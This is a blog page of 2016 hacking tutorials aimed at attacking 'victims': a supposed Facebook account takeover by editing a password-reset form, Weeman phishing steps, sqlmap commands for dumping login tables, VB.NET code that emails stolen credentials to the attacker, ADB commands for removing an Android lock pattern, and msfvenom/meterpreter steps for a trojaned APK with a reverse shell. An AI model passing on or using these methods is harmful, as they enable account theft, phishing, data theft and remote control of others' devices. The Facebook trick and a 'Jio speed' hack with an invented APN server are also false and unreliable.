Showing posts with label computer tech. Show all posts
Showing posts with label computer tech. Show all posts

Monday, 28 November 2016

facebook hack using html




THIS IS NEW WAY OF FACEBOOK HACK USING HTML CODE


STEP 1-LOGIN TO YOUR ACCOUNT



STEP 2- SEARCH VICTIMS USERNAME

STEP 3- LOGOUT YOUR ACCOUNT THEN GIVE FORGOT PASSWORD


STEP 4- TYPE USERNAME AS VICTIM ID AND GIVE SEARCH

STEP 5- IN RESET MENU RIGHT CLICK AND SELECT INSPECT ELEMENT

STEP 6- IN PSASWORD RESET CODE HTML GIVE EDIT-->HTML THEN COPY THE GIVE CODE BELOW AND GIVE CONTINUE THEN IT WILL ASK YOU TO GIVE NEW PASSWORD TO VICTIM ACCOUNT THATS IT

 

 

HTML CODE

<form method="post" action="/recover/password?u=(VICTIM USERNAME)&amp;n=389548" onsubmit="return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)" id="u_0_4"><input type="hidden" name="lsd" value="AVoH0gpvlk4" autocomplete="off"><div class="mvl ptm uiInterstitial uiInterstitialLarge uiBoxWhite"><div class="uiHeader uiHeaderBottomBorder mhl mts uiHeaderPage interstitialHeader"><div class="clearfix uiHeaderTop"><div class="rfloat _ohf"><h2 class="accessible_elem">Choose a new password</h2><div class="uiHeaderActions"></div></div><div><h2 class="uiHeaderTitle" aria-hidden="true">Choose a new password</h2></div></div></div><div class="phl ptm uiInterstitialContent"><div class="mvm uiP fsm">A strong password is a combination of letters and punctuation marks. It must be at least 6 characters long.</div><table class="uiInfoTable" role="presentation"><tbody><tr class="dataRow"><th class="label"><label for="password_new">New Password</label></th><td class="data"><input type="password" class="passwordinput" id="password_new" name="password_new" tabindex="1" autocomplete="off"><label class="mls uiButton" for="u_0_0"><input value="?" onclick="show_pwd_help(); return false;" tabindex="3" type="button" id="u_0_0"></label><div id="password_new_status"></div></td></tr><tr class="dataRow"><th class="label"><label for="password_confirm">Confirm Password</label></th><td class="data"><input type="password" class="passwordinput" id="password_confirm" name="password_confirm" tabindex="2" autocomplete="off"><div id="password_confirm_status"></div></td></tr></tbody></table><div class="mvl"><div class="mvm">To make sure your account's secure, we can log you out of any other computers and phones. You can log back in with your new password.</div><div class="mvm"><div class="uiInputLabel clearfix uiInputLabelLegacy"><input type="radio" checked="1" name="reason" value="kill_sessions" onclick="CSS.hide(ge(&quot;chpw_survey_hacked_warn&quotWink)" class="uiInputLabelInput uiInputLabelRadio" id="u_0_1"><label for="u_0_1" class="uiInputLabelLabel">Log me out of other devices</label></div><div class="uiInputLabel clearfix uiInputLabelLegacy"><input type="radio" name="reason" value="keep_sessions" onclick="CSS.show(ge(&quot;chpw_survey_hacked_warn&quotWink)" class="uiInputLabelInput uiInputLabelRadio" id="u_0_2"><label for="u_0_2" class="uiInputLabelLabel">Keep me logged in</label></div></div><div class="mtm hidden_elem" id="chpw_survey_hacked_warn" style="color:red;">If your account was hacked, please select "Log me out of other devices"</div></div></div><div class="uiInterstitialBar uiBoxGray topborder"><div class="clearfix"><div class="rfloat _ohf"><label class="uiButton uiButtonConfirm" id="btn_continue" for="u_0_3"><input value="Continue" name="btn_continue" type="submit" id="u_0_3"></label><a class="uiButton" href="/" role="button" name="reset_action"><span class="uiButtonText">Cancel</span></a></div><div class="pts"></div></div></div></div></form>
Read More

Tuesday, 15 November 2016

facebook hack-phishing method

how to hack facebook..,gmail., twitter.,or yahoo using phishing attack???

Here you can see how to hack facebook using phishing  attack with step by step procedure..using kali linux this is best tutorial ever you tried because normaly you will download source page and send to victim but now a days hosting wont allows you  to upload vulnerable files so that you cant upload any vulnerable files over there its difficult for users so i have made an extradinory tutorial

DOWNLOAD ---  WEEMAN 

step 1- cd Desktop/weeman-master

step 2- ls

step 3-sudo ./weeman.py


step 4-set url (your reomended site example http://www.facebook.com)

step5- set action_url http://(your recomended site)

step 6- set port 8080

step 7 -run

thats it it will shows you server just copy it and send to victim he wil enter his login details so that you can see it in your weeman
Read More

Thursday, 10 November 2016

Website Hacking



Now you can hack any websites using sql method just follow these below commands



step 1-search for sql websites "php?id=1 or...2.,3..etc

step 2- in terminal sqlmap -u (website url) --dbs

step 3- sqlmap -u (website url) -D

step 4- sqlmap -u (website url) -D  (database which we found) --tables

step 5- sqlmap -u (website url) -D (database) -T (login or user smthng) --columns

step 6- sqlmap -u (website url) -D (database) -T (login or user smthng) -C (username or password) --dump



Read More

Tuesday, 8 November 2016

Email Sending Keyloger using Visual Studio


This is email sending keyloger which means you going to code this tool with your email address so that when the victim install this tool and enters his / her login detail it wil send the logs to your email address ..whats the special thing in this tool was.. "you gonna create it"...

first install visual studio..


after that open new project  ========>> windows application

then create a layout for an tool and place the code inside that tool layout copy the below code ( coded by hackfate)


ImportsSystem.Net.Mail
Public Class Form1
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

End Sub

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click

Dim MyMailMessage As New MailMessage()
Try
            MyMailMessage.From = New MailAddress("YOUREMAIL")
            MyMailMessage.To.Add("YOUREMAIL")
            MyMailMessage.Subject = "Log info"
            MyMailMessage.Body = "Name: " & TextBox1.Text & " / Pass: " & TextBox2.Text
            Dim SMTP As New SmtpClient("smtp.gmail.com")
            SMTP.Port = 587
            SMTP.EnableSsl = True
            SMTP.Credentials = New System.Net.NetworkCredential("YOUREMAIL", "YOUREMAILPASSWORD")
            SMTP.Send(MyMailMessage)
        Catch ex As Exception
End Try
End Sub
End Class



Read More

Saturday, 5 November 2016

android pattern bypasser



THINGS NEEDED :

1)Download ADB files with DRIVERS

2)USB CABLE

METHOD :

1) CONNECT YOUR ANDROID PHONE with PC

2)install ADB files in pc

3)open command prompt (win + R )

4)Type ADB devices and press enter 

ADB COMMANDS FOR REMOVING ANDROID PATTERN


ADB shell
su
rm/data/system/gesture.key

 

 

now open your mobile android it will accept any pattern

Read More

jio speed



METHOD-1

CHECK YOUR SPEED WITH  SPEED TEST OR NETWORK VELOCITY 
 Its an simple trick.....
just go to your settings ->data limit

now u can see  your used data and the data u set as default its like( o-40 ) something like that
all u have to do is just make it as zero ( 0 )





now check your speed it will become 2xtimes speeder than before


 

METHOD -2 

First of all change your  NETWORK MODE to LTE

APN SETTINGS



  • PORT-8080
  • SERVER-WWW.WFJIO5%4G.COM
  • AUTHENTICATIO TYPE  -  PAP
  • BEARER - LTE
  • ->SAVE


Now download  SURFEASY from googleplay
-> register it and turn it on ''YOU WIL GET HIGH SPEED DATA"




Read More

android mobile hack



 

OPEN terminal then do the following


step 1- msfvenom -p android/meterpreter/reverse_tcp LHOST=(ur ip address)  LPORT=4444( anything) R> Appname.APK

 

step 2- msfconsole


step 3-use multi/handler

 

step 4-set payload android/meterpreter/reverse_tcp set LHOST( ur ip)

 

 

step 5- set LPORT 4444

step 6- EXPLOIT


thats it u created an exploitable android app....all u have to do is send that app to the victim via email or else u can upload it in some host ask them to download then u can control their mobile

Read More